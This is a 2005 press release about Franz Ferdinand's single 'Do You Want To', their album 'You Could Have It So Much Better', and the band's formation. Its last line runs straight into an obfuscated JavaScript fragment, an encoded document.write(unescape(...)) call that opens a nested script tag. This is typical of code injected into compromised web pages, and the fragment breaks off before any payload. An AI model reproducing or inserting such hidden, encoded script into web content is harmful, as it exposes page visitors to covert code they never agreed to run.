Franz Ferdinand release a new single, Do You Want To, through Domino Records on Monday September 19th 2005. The first single to be taken from their second album, You Could Have It So Much Better…With Franz Ferdinand, which will be released two weeks later on October 3rd.
The single was recorded in Scotland in the spring of this year as part of the bands album sessions with production credits being shared between the band and Rich Costey. Recorded fast and simply (the way records used to be, and generally should be made), the album was completed in the famous Avatar Studios (Chic, Bowie, Roxy Music) in New York City in June.
The band have also announced a number of UK shows prior to the release of the single. They will be performing at both this summers V and T on the Fringe Festivals.

Franz Ferdinand formed around the end of 2001 in Alex's kitchen when Bob was given a bass on the condition he did something useful with it. A fight with Nick over a bottle of vodka at a party and the roping in of Glasgow's best drummer Paul Thomson saw the line-up finalised.
By the early months of 2005 Nick had given back the bottle of vodka he had stolen from Alex, the band had sold in excess of three million records worldwide, picked up a few awards (Brits, a mercury prize, an ivor novello and a few NME gongs), Bob had completed work on a prototype Lancaster paper weight and a second album had more or less been finished.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
